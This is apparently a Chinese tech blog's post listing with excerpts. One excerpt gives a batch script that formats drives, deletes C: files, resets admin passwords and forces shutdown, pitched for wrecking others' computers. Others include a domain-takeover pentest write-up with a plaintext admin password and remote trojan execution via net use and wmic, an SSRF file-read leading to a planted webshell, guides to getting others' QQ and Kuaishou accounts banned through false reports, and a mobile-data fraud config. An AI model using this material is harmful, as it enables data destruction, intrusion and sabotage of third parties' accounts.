• 宝塔面板如何针对PHP8.1安装zip扩展

    杂谈 很多热心网友发现部分PHP软件需要zip扩展,才能正常安装、使用,下面我们将带大家快速了解,如何查看自己是否已经支持zip扩展、如果没有如何安装zip扩展 检查自己是否有zip扩展 方法一:软件商店>运行环境>PHP8.1设置 你可以去phpinfo中查看自己是否有zip扩展,如果已加载中显示有zip扩展,代表你的环境已经支持了zip扩展 方法二:使用命令行查看 当然,你也可以使...

    2023-03-10 296
  • 10秒毁了一台电脑教程(无视任何杀毒软件)

    (仅供学习交流,否则后果自负) 上面这一段代码的意思是快速格式化D到Z盘的所有内容。没有则掠过 再回车输入 cd c:\attrib +s +h "windows"attrib +s +h "Program Files"attrib +s +h "Documents and Settings"这段代码是切换到C盘,并且隐藏C盘重要文件,将其设置为系统只读隐藏文件。然后回车输入cd C:\Documents and Settings\Administrator\桌面attrib +S +h上面是隐藏桌面继续回车输入代码net user administrator nisidinglenet user guest nihuile这段代码意思是将计算机的administrator(超级管理员)账户和Guest(来宾账户)设置密码,分别是“你死定了”和“你毁了”的汉语拼音接着回车输入shutdown -r -t 60 -c "敢惹老子!你死定了!"这段代码是设置1分钟关机的,并且会提示:敢惹老子!你死定了也可以把提示换成别的,只要在120个字之内最后回车输入net user administrator /active:no最后这段代码将直接禁用Administrator用户,别人将重启后将无法进入系统然后回车输入 del /f /s /q c:*.*这句命令是删除C盘所有能删除的文件,并且也删除了shutdown和net这两个DOS命令,使对方无法解除关机最后一步把txt文件改成bat文件,只要双击后,你的电脑基本就毁了...

    2023-03-01 320
  • 网站中超链接方式直接添加QQ好友

    网站中超链接方式直接添加QQ好友如下: tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=2155890353 上面链接可以进行直接调用qq,进行添加好友。(2155890353是qq号码) 若QQ没有运行会显示     ...

    2023-03-01 280
  • 细述SQL注入攻击杀伤链的七个步骤

    网络攻击会对一家组织的系统造成巨大的破坏,而且近些年来越来越频繁。SQL注入攻击是一种破坏性特别大的攻击。这种形式的攻击指,通过使用结构化查询语言(SQL),利用网站或应用程序代码的漏洞。SQL注入攻击被认为是最严重的网络威胁之一,因为它让攻击者可以访问存储在数据库中的敏感数据、篡改或删除数据,甚至创建新的用户帐户。借助这种手段,攻击者就可以控制整个系统。 与其他网络攻击非常相似,恶意分子在整个攻击生命周期的不同阶段执行SQL注入攻击。只有剖析这种攻击的每个阶段,并了解其工作原理,组织才能够更好地保护自己,同时改善整体网络安全状况。 了解SQL注入攻击的网络杀伤链 SQL注入攻击的网络杀伤链由七个阶段组成。下面将详细阐述每一个阶段。 1. 侦察 在侦察阶段,攻击者确定有关攻击目标的信息,比如对方的弱点和漏洞。这通过从各种来源收集数据来完成,包括社交媒体帐户、公共记录和搜索引擎结果。攻击者还可能使用端口扫描器等黑客工具来识别系统上敞开的端口。特别是在SQL注入攻击期间,攻击者使用众多技术来访问目标。 了解攻击目标的弱点可以帮助攻击者集中精力,花更小的力气更快速地发动有效的攻击。攻击者了解系统或网站上存储的数据类型后,就能确定使用哪种类型的恶意代码植入到系统上。这个阶段还让攻击者可以先尝试不同的方法来攻击小目标,然后尝试攻击更大的目标。 2. 武器化 武器化阶段发生在攻击者识别并利用系统中的漏洞之后。这类漏洞可能包括代码缺陷、错误配置,或者甚至因不安全的编程实践而留下的后门。在这个阶段,攻击者将设计恶意攻击载荷,旨在访问敏感信息或破坏操作。这些攻击载荷可能以多种形式出现,包括恶意软件、脚本或注入到脆弱系统中的其他恶意代码。 SQL攻击者设计明确为目标环境定制的恶意载荷。这些载荷旨在绕过组织的安全措施、访问敏感信息或破坏操作。攻击者可能会使用Metasploit之类的自动化工具,快速轻松地生成恶意载荷。此外,攻击者可能使用自动化工具和数据提取方法(比如SQLmap或XSS攻击),将这些载荷注入到目标系统中。 3. 投放 投放阶段是指向目标系统发送恶意代码或脚本,以获得未经授权的访问权。攻击者可能使用网络钓鱼电子邮件或受攻击的网站作为途径,比如含有恶意代码的JavaScript文件或HTML文档。这些载荷所含的指令可以利用目标系统上易受攻击的Web应用程序存在的漏洞,并访问特权信息。 攻击者还可能使用跨站脚本(XSS)技术,通过客户端脚本(比如JavaScript或HTML文档)将恶意代码注入到Web应用程序中。这使得攻击者可以通过在网站或应用程序的服务器端执行未经授权的命令来窃取敏感数据,比如登录凭据。在投放阶段,攻击者可以在服务器端应用程序接受用户输入内容之前对输入内容做手脚,从而篡改现有的应用程序功能。 4. 利用 一旦攻击者获得了公司系统的访问权限,就会开始利用其资源。攻击者可以控制整个数据库,甚至控制整个网络,具体取决于他们获得的信息类型。比如说,如果他们获得了网络上具有全面特权的管理凭据,就可以删除文件、篡改设置和配置,甚至删除整个数据库。 如果恶意分子可以利用现有系统或数据库上被盗的凭据来创建拥有全面权限的新用户帐户,SQL注入攻击构成的威胁会进一步加大。借助不受限制的访问权,他们可以创建拥有特权访问权限的新用户帐户,或篡改拥有更高权限的现有用户帐户。这种类型的活动会使攻击者可以全面控制组织的IT基础设施和敏感数据,等到有人注意时为时已晚。 5. 安装 安装阶段发生在攻击者将恶意载荷成功地投放到攻击目标之后。在这个阶段,攻击者通常会在易受攻击的系统上安装后门,以保持访问权限,并在未经授权的情况下执行另外的命令。攻击者可以通过利用已知的漏洞或使用泄露的凭据安装后门。威胁分子可以使用这些后门来访问敏感信息,比如密码、信用卡号码或其他机密数据。 一旦攻击者安装了后门,他们通常会在未经授权的情况下远程连接并执行恶意命令。这可能会安装另外的恶意软件、窃取数据、篡改现有配置或控制整个系统。此外,如果攻击者能够访问系统的根目录,就可以安装他们选择的任何软件,并绕过大多数安全措施。 6. 指挥和控制 指挥和控制阶段发生在攻击者获得了易受攻击系统的访问权限,但尚未启动恶意载荷之后。在这个阶段,攻击者将建立持久性的远程访问和机制,对受攻击系统保持控制,即使系统被重新启动或与互联网的连接暂时中断也难逃魔掌。此时,攻击者还可能收集更多的信息,或部署另外的恶意文件,以帮助自己达成目的。 7. 目标行动 目标行动阶段是SQL注入攻击的最后一个阶段。在这个阶段,攻击者通常会启动恶意载荷,并采取他们想要采取的任何行动。这可能包括访问敏感数据、篡改现有配置或执行恶意命令,以进一步访问网络中的其他系统。攻击者可能利用受攻击系统作为跳板,进而对其他网络或系统执行分布式拒绝服务(DDoS)攻击,或者使用该系统来存储被盗数据或托管恶意代码。 在这个阶段,攻击者可能会通过删除表明他们参与的任何证据来企图掩盖踪迹。在攻击得逞后,他们通常会断开与远程接入点的连接,删除其活动留下的所有痕迹。 对付SQL注入时,知识就是力量 SQL注入攻击是任何一家组织面临的严重威胁。它们可能导致机密数据被盗、组织的IT基础设施受到破坏,甚至导致收入损失。然而,如果了解SQL注入攻击的不同阶段,组织就可以采取措施来减小这些风险。此外,实施强大的安全措施(比如限制对特权帐户的访问和定期扫描易受攻击的系统),有助于确保挫败任何企图实施SQL注入攻击的活动,以免造成重大破坏。  ...

    2023-02-28 252
  • 记一次平平无奇有手就行的幸运域控(内网渗透必看)

    目录 0x00前言 0x01外网打点 0x02上线CS 域信息收集 抓取hash 提权 0x03横向移动 IPC$横向 使用条件 SMB Beacon 使用条件 建立SMB Beacon监听 psexec_psh横向 域管上线 横向域控 0x04 总结 记一次平平无奇有手就行的幸运域控 0x00 前言 最近在学习内网渗透,很想找个机会练练手。正好团队接到红队评估的项目,于是便有了此文,没什么技术含量,师傅们轻点喷。 0x01外网打点 在外网打点的的时候,都是些小打小闹,没有拿到权限,很是苦恼,最后突然发现了这个站点,一下子坐了起来,直觉告诉我有戏 Ps: 这里自己总结了一些Weblogic常见漏洞 Weblogic12存在 Wls9-async漏洞和 XMLDecoder漏洞,这里直接利用漏洞利用工具验证,漏洞存在。 先简单看一下当前用户权限,当前为administrator权限 直接传个冰蝎上去看看 冰蝎连上去,内网信息收集一波 系统:Windows Server 2008 R2 Enterprise 域:berca.co.id 当前主机是一台Windows Server 2008的机子,那我们就可以抓到明文密码,并且存在域环境。 IPv4 Address. . . . . . . . . . . : 192.168.10.22     Primary Dns Suffix  . . . . . . . : berca.co.id   DNS Suffix Search List. . . . . . : berca.co.id   DNS Servers . . . . . . . . . . . : 192.168.15.187                          192.168.15.180        收集到这里,通过DNS服务器初步判断,192.168.15.180、192.168.15.187这两台就是域控机器,后面也证实这两台就是域控机器。 再看一下进程列表,看一下是否存在杀软,就很棒,居然没有杀软 查看域用户失败,提示权限不足 net user /domain   //查看域用户 默认共享开启 net share  //查看默认共享 0x02上线CS 后续想继续收集一些域信息,但是因为权限不足,所以干脆一不做二不休直接祭出内网大杀器CS,直接powershell一句话上线CS 域信息收集 内网存活主机扫描一波: net view /domain   //查询域 net view /domain:ROOT  //查询ROOT域内所有机器 net group "domain computers" /domain  //查询所有域成员计算机列表 大概看了下,有好几百台机子,还不错。 net time /domain  //查询主域 域服务器通常也会作为时间服务器,主域:\ADBHPSRV.berca.co.id net group "Domain Controllers" /domain  //查看域控列表 Nslookup -type=SRV _ldap._tcp  //查看域控主机名 得到两台域控的地址和主机名: 192.168.15.187 adbhpsrv.berca.co.id     192.168.15.180 adbhpsrv02.berca.co.id   net group "domain admins" /domain  //查询域管 域管还挺多,我们只要能拿到一个域管的权限,就可以在这个域内漫游了 net accounts /domain  //获取域密码信息 nltest /domain_trusts  获取域信任信息 抓取hash 在内网渗透中,很多横向移动的方法都需要先获取用户的密码或者Hash值才能进行,比如哈希传递攻击、票据传递等等。 因为目标机是windows server 2008,所以直接抓到了明文密码: 得到明文密码:Administrator/Psft24680!!@@62## 提权 因为当前是一个Administrator权限,当前主机补丁打得也比较少,所以这里尝试利用甜土豆提权到system,提权成功反弹回来一个system权限的会话 0x03横向移动 IPC$横向 IPC$ 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$可以与目标主机建立一个连接,利用这个连接,可以实现远程登陆及对默认共享的访问、访问目标机器的文件,上传、下载,也可以在目标机器上运行命令等。 使用条件 • 管理员开启了默认共享 默认共享是为了方便管理员远程管理而默认开启的共享,我们通过IPC连接可以实现对这些默认共享的访问。可以通过net share命令查看,前期信息收集时,就已经查看过当前主机是开启了默认共享的。 • 139、445端口开启 IPC连接需要139或445端口来支持,我们可以通过139和445端口来实现对共享文件/打印机的访问,IPC$连接默认会走445端口,不通的话会走139端口,这两个端口都可以单独实现文件共享。 当前主机满足上述IPC的利用条件,所以先尝试做IPC连接,发现10.23可以连接成功 shell net use \\192.168.10.23\ipc$ "Psft24680!!@@62##" /user:"Administrator" 然后在本机传个马,copy过去 shell copy C:\Windows\Temp\ma.exe \\192.168.10.23\c$\Windows\Temp\ma.exe 之后利用wmic远程执行 shell wmic /node:192.168.10.23 /user:Administrator /password:Psft24680!!@@62## process call create "cmd.exe /c C:\Windows\Temp\ma.exe" 但是在我传过去之后机器久久未上线,远程获取进程发现也并无杀软,猜测目标机器不出网。 SMB Beacon SMB Beacon使用命名管道与父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,常用来绕防火墙有奇效。 使用条件 • 具有SMB Beacon的主机必须接受端口445上的连接 • 只能链接由同一Cobalt Strike实例管理的Beacon 在域中,默认域用户是可以登录到除域控以外的所有主机。当我们得到其中一个域用户的账号密码,所以我们可以利用该域用户与其他主机建立IPC连接,然后让其他主机进行SMB Beacon上线,于是批量扫了下445开放的主机 这里扫到了10.23机器开放,前面IPC也是利用的它,这里试试用SMB Beacon让其上线。 建立SMB Beacon监听 首先创建一个SMB Beacon的监听 psexec_psh横向 建立好SMB Beacon监听,尝试进行横向,利用明文密码或者hash让机器上线SMB Beacon,这里利用的是psexec_psh 利用SMB Beacon成功上线后,后面就会有 ∞∞ 这个字符,这就是派生的SMB Beacon,之后再在这台机子抓hash 然后重复操作10.18、10.19 在横向18、19的时候发现了一个疑似域用户的,可以重复上面的IPC连接传马远程执行,或者用这个机子继续去smb横向 当我成功横向24的时候发现了一个域管用户sp_farm,并成功抓取到了明文密码 域管上线 1. 当抓到域管明文,可以直接利用CS的功能,切换用户上线 2. 如果没域管明文,可以查看当前机子是否有域管进程,注入域管进程上线 通过上述两种方式,都可以得到域管权限的回话 横向域控 有了域管权限,就可以直接横向域控了,前期的信息收集我们知道域控都在15段,我们当前所有拿到的机子都是10段的,所以这里利用了CS的另一个功能,我们可以自己添加目标机器,这里直接把域控的IP和主机名都添加上,操作系统写ukonw就可以了 添加好域管主机后,扫描了一下域控机器是否开放了445端口 发现都开放了445,之后就可以用域管权限的会话,或者域管权限的账户横向过去 横向成功,域控主机成功上线 然后导出域内hash,全部拿下 0x04 总结 内网渗透的思路、方法远远不止于此,本项目中用到的也只是很小的一部分,如果文中有错误,望大佬们斧正。   ...

    2023-02-28 338
  • 【全网首发】快手权重查询源码+接口

    最近很多的快手权重查询,输入快手id即可查询权重,是否被限流等等,优化算法,上传源码解压即可使用,要是想修改水印请修改13行,如果想关闭查询限制请删除128~141行。 新增: 统计访问用户ip,停留时间,导入sql然后修改config.php即可 明天更新带个人中心的后台,请关注Kirin博客~ 源码下载地址(内附接口):https://dufeng.lanzoum.com/iRfkU0rh5qlc ...

    2023-02-27 236
  • 实战 | 记一次针对非法网站的SSRF渗透

    分享下在做GA项目的时候的经历(已授权发布) 平平无奇的界面总是有着不可告人的秘密 fuzz目录无收获 开启了22,6379,80,443端口 无其他子域名 前后台分离 开局先梭哈 直接爆破,这里谷歌验证码是摆设 拿老板十年*命祝我。。。。。 这不来了吗,抱着激动的心颤抖的手(谢谢老板) 可惜是个低权限的账号,*命白给 进去没啥功能 看看加载的js有没有关键信息或者url参数 正常人都是慢慢看,格局打开直接搜upload 这不来了吗 url/api/upload/currency 构造下poc 开始上传,希望来了 好的,白名单,那没事了,下班 正当我不知道下一步怎么做的时候 按下f12 ?有没有可能是任意文件读取 尝试下跨目录../ 不行的话试下ssrf的file协议 出货了?尝试下读取 不应该啊,难道有检测,还是说用户权限问题禁止读取这个目录 尝试读取别的目录 不理解 在我思来想去,不知如何下手的时候,想到之前绕某防火墙中加个#号即可绕过,原理是#号在linux是属于提示符,不知道是不是像注释一样。 真刑,接下来就目标很明确了,现在web目录,在找配置文件(数据库或者redis的链接配置) 在漫长的搜索中。。。。,终于找到了 可惜是在内网,本来想找下有没有phpmyadmin链接的,但想到password文件有redis账号并且也开启了6379端口。 随手一翻就出来了,真是个大聪明 本来想反弹shell的,但急着下班,就随便写了个马子 文章来源:原创投稿作者:AVANS无名 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END ...

    2023-02-27 272
  • 记录一次通过不断FUZZ从而获取万元赏金

    0x01 前言       下午,一个老朋友发来一批资产让我找个有效漏洞,原因是厂商弄活动,提交有效漏洞可获取其奖品,那个奖品对朋友很有吸引力。 0x02 漏洞背景       一个后台系统,称其为https://manager.target.com。 0x03 漏洞挖掘过程       目标站点如下图所示,可以看到不仅要用户名密码,还需要正确的手机号,以及验证码才可登录。       对目标站点进行目录探测,未发现有用接口。进一步对其目录探测,使用wfuzz对https://manager.target.com/进行探测, wfuzz -w dict/test.txt https://manager.target.com/h5FUZZ也无果。至于为什么这样设置目录探测,因为在日常渗透中,我发现大多数h5站点登录都无需验证码,可能是方便手机端用户登录吧。 wfuzz -w dict/test.txt https://manager.target.com/h5-FUZZ,发现https://manager.target.com/h5-mobile返回302状态码, 其跳转到https://manager.target.com/h5-mobile/,发现页面空白,通过burp发现其加载了js文件。 从app.js文件发现mobileapi/login接口。从chunk.js文件中找到其参数。   </p> 构造post报文进行登录,返回账户密码错误,使用burp对其进行暴力破解,成功爆破出一组账号,返回一个token值。eyJadGadad1UxMiJ9.eyJsb2dpbl91c2VyX2tlfasdcLTYwYzasdsgzLThkM2Y5NDdiN2FiNSJ9.Mnp7HxlGHdadseN9wmW5vKMe19ffYRGwMYl4WeJJBkAEdj-d6h2HGF0oadqqwasm-brXrvG5q2p5rQ。 将其token值拼接在头部,构造post报文,访问https://manager.target.com/mobileapi/get/orderall(app.js中提取出来的接口),发现还是返回状态码401,怀疑是token头部字段问题,使用字典对token进行暴力破解,burp暴力破解模块设置如下图所示,其token常用的字段为token,access-token,Authenticator等。 发现头部身份认证字段为access-token。其返回了大量用户订单。 0x04 厂商反馈       漏洞交给了朋友提交,十分钟就得到了厂商反馈,本来以为算高危,厂商给了个严重,良心厂商。   </p>   </p>   </p> 0x05 总结      FUZZ的艺术还是需要不停地探索。   </p>   </p> ...

    2023-02-27 275
  • 教大家让手机微信在电脑微信不下线 的前提下 悄悄退出登录

    我给大家教一个让手机微信在电脑微信不下线的前提下悄悄退出登录   1.打开飞行模式   2.进入微信 点击我>设置>拉到最下面点击退出>退出登录   等一会儿出现地球图片以后再连接网络,这样你既让手机微信下线了又让电脑微信继续在线了   ...

    2023-02-19 276
  • 联通tiny免流教程

                              联通tiny免流 ——————————下面开始教程——————————— 第一步  设置APN:3gwap 代理:127.0.0.1 端口:65080 第二步 复制模式粘贴到软件。 起飞。 tiny软件:https://www.lanzoui.com/b004yxdhc 密码:5fgw   ——————————————————————————————      下面汇总几个问题          你们问我不会回答          请所有人认真看好 ①问:xx地区免不免? 答:需自测 ②问:xx软件免不免? 答:我试过的我会尽量发出来,没有那么多时间帮你测试,你自测xx软件免不免 ③问:没网怎么办? 答:调内网,也就是开关飞行模式 ④问:怎样知道是否成功? 答:下载几M东西查流量没扣就成功   ——————————————————————————————   地区测试:   ——————————————————————————————                                 模式如下: mode=wap;   listen_port=65080;   worker_proc=0;   daemon=on;   uid=3004;   http_ip=10.0.0.172; http_port=80; http_del="Host,X-Online-Host"; http_first="[M] [U] [V]\r\n 干扰\rHost: woif.10155.com\t\r干扰\t干扰\nHost: [H]\r\n干扰\r\n";   https_connect=on; https_ip=10.0.0.172; https_port=80; https_del="Host,X-Online-Host"; https_first="[M] [H]\t [V]X-Online-Host:woif.10155.com\n[V]\r\nHost: woif.10155.com\r\n";   dns_tcp=http;   dns_listen_port=65053;   dns_url="119.29.29.29";   ——————————————分割————————————     ...

    2023-02-19 541
  • 网站ico图标获取接口分享

    网站ico图标获取接口分享 https://qfdhslw.qfytd1.top/ico/?url=网站链接 注意必须带有 https或者http 图片的话自测     ...

    2023-02-16 340
  • 2.15最新快手封号思路

    最新快手封号思路,进行套词技术# 问对方可以QQ/微信等第三方平台 或者问你有抖音吗? 对方发出来,直接举报其他 详情里面填写 该用户想进行引导私下交易,含有诈骗,骗钱行为风险,应当封禁该账号给予处罚 网站刷5k播放量 然后在他的评论区刷几个黄词,举报即可百分百封禁 上限13w粉丝...

    2023-02-15 547
  • 支付宝当面付配置详细教程

    支付宝当面付配置详细教程如下新版支付宝接口改用了RSA2的密钥。操作以下步骤之前确保你有电脑,因为需要用到电脑软件生成密钥!第一步:申请支付宝官方支付接口首先需要申请支付宝官方支付接口,如果没申请接口,即使是配置上密钥也是无法使用的。申请地址是:https://b.alipay.com/signing/productSetV2.htm图片一然后打开网址:https://open.alipay.com/platform/developerIndex.htm图片二第二步:下载并安装“支付宝开放平台开发助手”安装完后直接运行即可。第三步:点击【生成密钥】(密钥长度和密钥格式都为默认,不用改),如下图所示图片三将【应用私钥】填写到网站后台相应的配置项内。第四步:进入支付宝开放平台密钥页面,可以看到APPID,将APPID填写到网站后台。然后点击【接口加签方式】后面的【设置】图片四接口价签模式选择“公钥”,然后将刚才在软件里面生成的【应用公钥】填写到下方输入框内:图片五保存设置之后,会出现一个【支付宝公钥】,将支付宝公钥复制后填写到网站后台。图片六至此,支付宝新版接口的密钥已经配置完毕了。要注意的是【支付宝公钥】和【应用公钥】是不一样的,千万不能搞混了!另外【应用公钥】和【应用私钥】是一一对应的,也就是填写到网站后台的【应用私钥】和提交到支付宝那边的【应用公钥】是同一对才可以!支付宝公钥怎么获取请看下图图片七...

    2023-02-14 344
  • QQ豪华绿钻老用户低价卡9.9元一月教程

    QQ豪华绿钻老用户低价卡9.9元一月教程 手机打开QQ音乐,点击会员中心,这时你会看见一个老用户专享9.9元开通,然后按照流程完成,扣费成功后,再去微信里面扣费项目删除自动续费的QQ绿钻就完成了! 不过得注意的是你的QQ绿钻必须在过期期间才能卡,不然卡不上的! ...

    2023-02-10 289
  • 分享个最方便的电脑截图方法

    你还在用微信和QQ截图吗? 这种方式不仅要联网还要登录软件, 用起来非常麻烦。 我们只要在桌面新建一个文本文档,命名为“截图”, 将后缀"txt"改为“bat”,然后右击文本选择编辑输入这行代码:start snippingtool, 然后保存。然后双击截图打开,就可以选择截图模式进行截图了。还不赶快试试!...

    2023-02-09 286
  • 实现Emlog支持标题和内容全文搜索功能的方法

    Emlog搜索功能默认只匹配文章标题,只有文章标题存在搜索的关键词才会匹配出结果,这样就会导致网站内容搜索查找难度增加。友好的搜索功能应该同时支持标题和内容的搜索,从而更加方便地查找想要的文章。让emlog支持全文搜索的方法也很简单,修改一下对应的sql查询语句即可。 修改方法: 在网站文件目录路径 include/controller/ 中找到 search_controller.php 文件,并编辑该文件 在代码中找到以下代码(大概在22行) 1 $sqlSegment = "and title like '%{$keyword}%' order by date desc"; 修改为 1 $sqlSegment = "and (title like '%{$keyword}%' or content like '%{$keyword}%') order by date desc"; 保存文件即可。 代码解释: 就是增加了一个内容字段 content 的关键词匹配,整体意思就是检索标题字段title或内容字段content是否包含搜索的关键词...

    2023-02-07 316
  • 登录QQ官网达到冻结账号教程(思路分享)

    第一步: 登录qun.qq.com获取qun的cookie 原理就是通过扫码授权获取qun的cookie其中我们要的是"uin" cookie对应的QQ"skey" 其QQ的通用密钥"pskey" 其QQ的qun密钥   第二步:使用第一步获取的数据通过接口创建一个群聊 原理第一步的数据相当一个零时钥匙,用这个可以操作各种各样的东西也需要对应的钥匙(qun,vip,im...)   第三步:用第一步的数据通过接口获取群列表找到刚刚创建的群的群号 原理就是通过简单的调用获取群的各种列表然后获取对应群号   第四步:用第一步和第三步获取的"uin""skey""pskey""group"通过更改群昵称的方法修改自己的群昵称改为xjp(即伟大的领dao人名字) ps:只是思路哦   第五步:等待2秒直接提示下线然后冻结再次打开那个群聊则又会提示下线冻结 声明         1.本教程仅供参考学习思路,而不是用于恶意冻结他人账号的目的         2.本帖不允许在本人未经允许的情况下进行搬运,搬运请标明作者出处         谢谢配合  ...

    2023-02-03 433
  • QQ怎么不被跑现绑

    1、下载一个QQ   2、进入钱包界面后,我们找到并点击右上角的个人设置进入个人设置界面。 3、然后我们在个人设置界面打开“实名认证”,选择身份证认证进入身份证认证界面。 4、在身份证界面输入相关信息,点击“确认”即可绑定身份证。 怎么样绑定qq号,就是绑密保一样不会被盗,绑后还可以在别的手机登陆这是不可能的。现在登录QQ,都是需要手机号验证的qq实名认证怎么解除绑定,提现不了在QQ钱包设置界面的实名认证中进行解绑。 那具体要怎么操作,我以手机为例教一下大家。 步骤1、点击手机桌面的QQ图标打开QQ 步骤2、点击左上角QQ头像 步骤3、点击[我的QQ钱包]进入钱包页 步骤4、点击右上角的设置图标 步骤5、点击[实名认证]进入实名认证页 步骤6、点击最下面的[账户更名] 步骤7、点击[知道了,继续] 步骤8、点击[确定],完成解绑实名认证 此时QQ钱包账户也就被注销了,有余额的话记得先把钱提现再进行解绑操作 ...

    2023-02-03 874
  • 2023年最新下号思路[QQ号封禁教程]

    方法1.自定义在线状态改敏感词就可以,对方截图,然后举报百分百可以7天,目前如图所示的词没有和谐,去某卫士举报可以达到永久目的 方法2.自己做个违规卡片,里面敏感词填狠一点让对方帮忙转发给你,就说是收集截图,然后举报,百分百掉,去某卫士可以永久哦两个方法思路绝不是水贴,和之前思路有点相似但是不一样哦! 还是你们的Kirin,觉得棒棒的给点奖励吧,点个关注还会更新的 ...

    2023-02-03 1234
  • 微信支持同手机号注册小号了

    一个手机号可以注册两个微信了,方便将工作号和生活号分开!路径微信设置。需满足4点条件: ...

    2023-02-03 333

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注